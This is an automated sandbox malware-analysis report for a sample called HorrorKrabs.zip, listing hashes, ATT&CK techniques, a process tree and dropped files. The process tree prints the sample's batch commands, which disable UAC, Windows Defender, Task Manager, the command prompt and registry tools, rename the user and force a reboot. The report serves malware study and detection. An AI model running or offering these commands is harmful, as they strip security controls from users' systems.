216f31c18146824ec864ce1cd25980075831e6194e8fc8995554239a3070f62f

Resubmissions

28/03/2025, 01:00

250328-bcz46azxfs 10

28/03/2025, 00:55

250328-a9rzdaslz3 10

Analysis

max time kernel
22s
max time network
67s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
28/03/2025, 00:55

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

HorrorKrabs.zip
Size

12.5MB
MD5

b075e5820bd51ea1edc114d8643dbecb
SHA1

6a88b93c174423486fad95346dd4c6f9958ed2d6
SHA256

216f31c18146824ec864ce1cd25980075831e6194e8fc8995554239a3070f62f
SHA512

798eda968adb4eade2cf58c967200587a163b9b0e3a650d37e3b1424b721734f01f820ee22c10b906c084fe78c73c8e19bc610562b80fe127bacdbc8d3c21f0a
SSDEEP

393216:l1Vj4dlFp2niHiXkgCSqCl8Gri0+CPTKqR/:l1Vj4dlP49eODeNGh

Score

6^/10

discovery

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
71	raw.githubusercontent.com
70	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

T1112

pid	Process
1180	reg.exe
1592	reg.exe
1620	reg.exe
1688	reg.exe
2368	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2052	chrome.exe
2052	chrome.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe
Token: SeShutdownPrivilege	2052	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe
2052	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2052 wrote to memory of 2064	2052	chrome.exe	32
PID 2052 wrote to memory of 2064	2052	chrome.exe	32
PID 2052 wrote to memory of 2064	2052	chrome.exe	32
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2724	2052	chrome.exe	34
PID 2052 wrote to memory of 2460	2052	chrome.exe	35
PID 2052 wrote to memory of 2460	2052	chrome.exe	35
PID 2052 wrote to memory of 2460	2052	chrome.exe	35
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36
PID 2052 wrote to memory of 2520	2052	chrome.exe	36

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\HorrorKrabs.zip
1⤵
PID:2556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef71e9758,0x7fef71e9768,0x7fef71e9778
  2⤵
  PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:2
  2⤵
  PID:2724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:8
  2⤵
  PID:2460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:8
  2⤵
  PID:2520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2300 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:1
  2⤵
  PID:2084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2312 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:1
  2⤵
  PID:2184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:2
  2⤵
  PID:1296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3244 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:1
  2⤵
  PID:772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3464 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:8
  2⤵
  PID:1840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3400 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:8
  2⤵
  PID:1284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:8
  2⤵
  PID:1628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3740 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2308 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:1
  2⤵
  PID:3012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3872 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:1
  2⤵
  PID:2920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3836 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:8
  2⤵
  PID:2860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3768 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:8
  2⤵
  PID:1888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3864 --field-trial-handle=1216,i,2025655806707191552,13062656474541553104,131072 /prefetch:8
  2⤵
  PID:1980

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1356

C:\Users\Admin\AppData\Local\Temp\Temp1_HorrorKrabs.zip\HorrorKrabs.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_HorrorKrabs.zip\HorrorKrabs.exe"
1⤵
PID:864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\krabsetup.bat" "
  2⤵
  PID:2448
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\windows\update32\bg.bmp /f
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:748
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1592
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:1620
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1688
- - C:\Windows\SysWOW64\net.exe
    net user Admin /fullname:"MR KRABS WAS HERE!"
    3⤵
    PID:1464
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Admin /fullname:"MR KRABS WAS HERE!"
      4⤵
      PID:1628
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2368
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1180
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 00
    3⤵
    PID:1344

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:2784

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
71KB

MD5
83142242e97b8953c386f988aa694e4a

SHA1
833ed12fc15b356136dcdd27c61a50f59c5c7d50

SHA256
d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

SHA512
bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
526B

MD5
efa23e00048cb343aa4bbb3945e7c842

SHA1
ea4be3cfccff2a503a9b1f0bdafdc402773971a9

SHA256
268ab27a284fa613478c95bc3c5677b91074de34c2643a3973c3cc451aeb9e79

SHA512
37759da753fa13dbdd37c4a2c14d276be51832f9612f9d04705909419c08de0de3828188bc5bf81989f99ad81904c46b3d9f96a16c7a83db5d61f27f0e17dce9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
526B

MD5
4c5fe5844fca9b4e286fc6a1cfc5a8c8

SHA1
a6c539b7a2a9c4c9b069625632f91e768050cf61

SHA256
a9bea4e493acabd0aa31fe5f714a6b5461c7c317ad3bf9a118f466e308594d86

SHA512
64126d5c0ef9799e2db5b24d1a13e8b92309cfad12b60c593c1a2e3da7089b17045fab154a6ccade7d945c4b5924759cbf5e7f92aae954ba580c3a7b3fef9369

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
9d24c8213b9d9733c1c9272a8210de81

SHA1
87e5e331441d70ee32252407e8da4478d9794da5

SHA256
7afc1dffa265c74c3744a199c42c25726bf58eda6e0c8b868ab2f324812a6b23

SHA512
eaf261213452c8fdcffc61590e4e4f13d09f5ec954c5e9f542a4e61198b8d534f3cec2af98c10e125ed652ae7fdc1141bd039141f75bec27fde4e3d0320362c0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
eaea9c1ff7948e8cb94003a06c406fe6

SHA1
179e19d372dcbba27ca65bd9081829bbdcf2d7de

SHA256
a2d45ff885fd16f60f8ac5fd6d898e8a3b3dda0b930681435b4eb55c6451f3bf

SHA512
7096d636246793fd4bb390b14d8d1a529f5d6029984a406532b160975269f16ac1932591c824e0c718e2adb30782c8afe0b54f82f950c6e89c2c94a59f4200b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
8ee44d3f8812757db27e813716ce243f

SHA1
e13e29d8668a668b8187c4a8869e8497a67a2ed9

SHA256
dfe43872748d2e3e5255241ad909ea69b73d08b7e7c030d4ad5cb6981437c0ba

SHA512
ced6dc2987ecf855c007720c380d436dd8e438c6cf9fae24ea24077d48d664df5abd80aa18a8628d9556e5544d7c40512bf5b6dc8ea867b64b6259972b392873

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\b241e174-1844-4999-b900-dbbce92a4ac5.tmp

Filesize
6KB

MD5
4e682562b627fb75ce51ecbb7c8c603d

SHA1
b3c7750c99c5f60b738370b0122b8632cdcf959b

SHA256
e329ef9c566982e33aa57052543956f3dbff6240471b7e6a41083abfc1122549

SHA512
73f4816a475ab79248189d0a2297c48f74ae3552f61ce257aca7faf1938d4ea413d56519dfc440c9fe78d90a5773c7260eca4b85ed9795e9191a8d657f98aec0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
362KB

MD5
ac86dc2e6e2c9f067c49a514d5f80b97

SHA1
60a619441138ceca6c8ffbe3629ac61cf22ad0b3

SHA256
0b08754e1c07c24ffc21de9c871389e703e33e2bf3ca730650a9f409a08f739d

SHA512
a7c7776f9c7dc288cac32921d4901599648c2c61183935b478489a6208c9b416d0827a5312c53cad3db2c6d29aead2065d879b62941505bd63b34bfb69475d5e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5393.tmp

Filesize
183KB

MD5
109cab5505f5e065b63d01361467a83b

SHA1
4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

SHA256
ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

SHA512
753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\bg.bmp

Filesize
11.7MB

MD5
009b9f7e5b7b45674e6de11dfbc5873d

SHA1
fc848c11b0eb1c48b6e49e59bfb2df069ccf7756

SHA256
5b40b1922ac983f07ecc3e444813734aa03ce3270b7e5c0dc93610e34ed58de7

SHA512
cfe2087b0711a5d7ce486f338c49d5c6147b3c931f13b3ba27628200f26c3a9776de91a1cabd7bfd274a08fbe7b8a4f9ec172e4f7cfbf3234c8aa35399d03549

Download Submit
C:\Users\Admin\AppData\Local\Temp\krabsetup.bat

Filesize
1KB

MD5
7f5a110ccd8737cebf3f52b49424eecc

SHA1
67a0a8ef8745e20b1cc100a2ab95cde32ad7959a

SHA256
2ae0d42a78a32d4f8f81060cbe29b95eff8a90031690d2b7cc70d540a6110d03

SHA512
68d4d79c3007b50dcbd783f6e3020b8e640613c79943c8cf82456dcb7892baf0466b4f2dba4a3b9da6240cb305acdb3c9000f7b80bf63649ade767d8963476c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\krabslol.exe

Filesize
19.3MB

MD5
e1a919b2c68ec9e615b390adb8064bf0

SHA1
a0cab57b6bdbe2dcb888ea07fe4ed161916f6398

SHA256
6166b3e0ec7478ac54b33edaf001fb2421f15a559bcc0f37f09c08a4e466fda8

SHA512
3e837cd486806d63516488b2ac0a514e2e03bf3d7c511a7aa6c532c0569580cfbe81311d57b4a3621ee151806994e0935cf2528fadfe275a8a9a3242610a4279

Download Submit
C:\Users\Admin\Downloads\HorrorKrabs.zip.crdownload

Filesize
12.5MB

MD5
b075e5820bd51ea1edc114d8643dbecb

SHA1
6a88b93c174423486fad95346dd4c6f9958ed2d6

SHA256
216f31c18146824ec864ce1cd25980075831e6194e8fc8995554239a3070f62f

SHA512
798eda968adb4eade2cf58c967200587a163b9b0e3a650d37e3b1424b721734f01f820ee22c10b906c084fe78c73c8e19bc610562b80fe127bacdbc8d3c21f0a

Download Submit
memory/864-417-0x0000000000C80000-0x0000000002BA8000-memory.dmp

Filesize
31.2MB

Download
memory/864-414-0x00000000743FE000-0x00000000743FF000-memory.dmp

Filesize
4KB

Download